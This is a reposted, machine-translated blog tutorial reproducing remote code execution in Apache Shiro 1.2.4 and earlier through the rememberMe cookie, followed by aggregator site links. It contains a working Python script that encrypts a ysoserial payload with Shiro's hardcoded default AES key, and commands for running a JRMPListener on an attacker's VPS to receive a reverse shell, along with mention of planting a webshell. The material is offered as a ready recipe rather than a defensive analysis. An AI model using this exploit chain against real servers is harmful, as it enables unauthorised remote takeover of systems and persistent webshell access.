Apache Shiro deserialization remote code execution reproduction

Others 2019-06-15 11:40:32 views: null

Affects Version

Apache Shiro <= 1.2.4

Use components

commons-collections4 org.apache.commons in (theoretically also commons-collections2)

Use position

Http request parameter in any cookie at rememberMe


5350990-e028ac1bdc95139c.png
Use position

Difficulties environment to build

Shiro use maven compiler has a lot of pits, given too painful, I list the main pit

1. The machine needs to be installed mvn, svn command
2.jdk recommendations 1.6
3.maven best version is 3.1.1

Address environmental needs above basically will not fail to compile.
If you fail to compile it is not confident, you can use my war package provided by:
https://pan.baidu.com/s/1dSHR21IQbrLHpaSQ1TI23A extraction code: zg4h
very simple to deploy war package, just to put it in the tomcat webapps directory, it will automatically unzip, of course, its default name is samples-web-1.2.4, in order to facilitate access we can rename shiro

5350990-30003f1eaefcead3.png
shiro

Use step

Environmental ready to use
5350990-0d747fb8c42b27c3.png
Operating Environment

You need to place a ysoserial on the public network VPS, used in conjunction with the following python script

shiro_exp_payload.py

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES


def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
print "rememberMe={0}".format(payload.decode())
Excuting an order

1. The first shell command execution rebound of
2. Run the following command on the vps
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "反弹shell的命令"

Command here, with the need to use the Java Runtime bash coding, CommonsCollections4 can also be replaced CommonsCollections2
3. Use python script
python shiro_exp_payload.py vpsip:1099
python script will generate a cookie, the cookie into your http request to rebound shell
such as the following figure

5350990-af55bcefdf7aa88c.png
With cookie access

5350990-db5eb616f96b46e5.png
Rebound shell

5350990-601a031fe410e355.png
Rebound shell

(I give here a rebound shell, of course, you can use the echo write shell or something, only to rebound shell commands into the command shell written)

The path may write shell according to the following with reference to FIG.


5350990-8facd64d1a2909e9.png
Write shell path
5350990-09a0bd5efa9e4cd1.png
webshell

Reproduced in: https: //www.jianshu.com/p/c0cb65667145

Guess you like

Origin blog.csdn.net/weixin_34040079/article/details/91268594
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com